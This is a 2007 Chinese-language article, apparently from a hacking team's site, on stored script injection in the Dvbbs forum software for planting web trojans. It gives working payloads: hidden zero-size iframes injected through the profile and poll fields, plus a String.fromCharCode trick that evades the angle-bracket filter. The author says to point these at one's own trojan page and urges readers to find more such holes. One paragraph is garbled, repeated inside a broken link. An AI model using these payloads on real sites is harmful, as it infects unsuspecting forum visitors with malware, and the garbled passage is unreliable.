快捷導(dǎo)航

新思路現(xiàn)動網(wǎng)新漏洞

更新時間：2007年01月16日 00:00:00 作者：

作者：優(yōu)格GXU 文章來源：邪惡八進(jìn)制信息安全團(tuán)隊

文章作者：優(yōu)格[GXU] （www.wuzhou.org）
信息來源：邪惡八進(jìn)制信息安全團(tuán)隊（www.eviloctal.com）
原文下載：http://www.wuzhou.org/dvbbs.doc

前段時間focn等人發(fā)現(xiàn)了動網(wǎng)的提權(quán)漏洞，這漏洞可是鬧得天翻地覆的，連當(dāng)當(dāng)網(wǎng)論壇也給掛上馬了。正是這個漏洞蓋住了動網(wǎng)的其他漏洞，使動網(wǎng)的其他漏洞少為人知。
相信大家都看過《終結(jié)動網(wǎng)最新掛馬方法！》的文章了，其實(shí)這個漏洞已經(jīng)出現(xiàn)了大概半月了，后來才被公布出來。利用方法就是在“修改個人聯(lián)系方法”中的“個人主頁”寫入代碼：
</Script><IfraMe height=0 width=0 src="http://www.wuzhou.org"></IfraMe>
在MSN中寫入代碼：
<Script Language=JavaScript>var actioninfo3='單帖屏蔽'
其中木馬。這樣，我們發(fā)貼或者回帖，只要有人訪問這個帖子就會跳轉(zhuǎn)訪問我們的木馬。其原理就是對原代碼進(jìn)行欺騙，今天主要說的是動網(wǎng)的另一個掛馬方法-----投票掛馬。通過測試，發(fā)現(xiàn)動網(wǎng)的所有版本均存在這個漏洞。 href="http://www.wuzhou.org為你的網(wǎng)頁木馬。這樣，我們發(fā)貼或者回帖，只要有人訪問這個帖子就會跳轉(zhuǎn)訪問我們的木馬。其原理就是對原代碼進(jìn)行欺騙，今天主要說的是動網(wǎng)的另一個掛馬方法-----投票掛馬。通過測試，發(fā)現(xiàn)動網(wǎng)的所有版本均存在這個漏洞。/" target=_blank>http://www.wuzhou.org為你的網(wǎng)頁木馬。這樣，我們發(fā)貼或者回帖，只要有人訪問這個帖子就會跳轉(zhuǎn)訪問我們的木馬。其原理就是對原代碼進(jìn)行欺騙，今天主要說的是動網(wǎng)的另一個掛馬方法-----投票掛馬。通過測試，發(fā)現(xiàn)動網(wǎng)的所有版本均存在這個漏洞。
首先，我們發(fā)表一個投票看看。如圖1
我們看一下源文件：
<Script Language=JavaScript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</Script>
其中ssssssssss是我們自由寫入的，那么我們能不能對源文件進(jìn)行欺騙，從而讓它運(yùn)行我們的代碼呢？打個比方，一個括號：（），當(dāng)我們在（）內(nèi)寫進(jìn)）和（，那就變成了兩個括號。道理是相同的，我們也可以這樣進(jìn)行代碼欺騙。我們在發(fā)表投票中寫入：
';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='

在這里順便說一下，動網(wǎng)的投票功能沒有進(jìn)行嚴(yán)密的過濾，當(dāng)寫入的投票項(xiàng)目為網(wǎng)頁代碼時，代碼照樣可以執(zhí)行，而且寫入的代碼并不按照它所說的“每行一個投票項(xiàng)目，最多10個”，并沒有分行。發(fā)表投票后，查看源文件：
<Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script>
代碼是無法執(zhí)行的，動網(wǎng)進(jìn)行了過濾。再次饒過思路，動網(wǎng)只是對<和>進(jìn)行過濾，對+'/等符號沒有過濾。再次在投票那寫入代碼：
';document.all.popmenu.innerHTML=document.all.popmenu.innerHTML+String.fromCharCode(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=http://www.wuzhou.org width=0'+String.fromCharCode(62)+String.fromCharCode(60)+'/IFRAME'+String.fromCharCode(62);var vote='1

發(fā)表后成功跳轉(zhuǎn)了www.wuzhou.org這個站。如果我們把站改成我們的網(wǎng)頁木馬，那么一個木馬貼就這樣完成了。其實(shí)這只是動網(wǎng)代碼欺騙的一小部分，還有不少的地方可以進(jìn)行代碼欺騙，比如用戶頭像，聯(lián)系方法等。

后記：現(xiàn)在很多的程序作者并沒有看到到代碼欺騙這安全危害，在我看的很多網(wǎng)站程序，不管是asp還是php的，都有許多程序可以進(jìn)行代碼欺騙，希望這篇文章能起到拋磚引玉的效果,讓各位朋友找到更多的漏洞。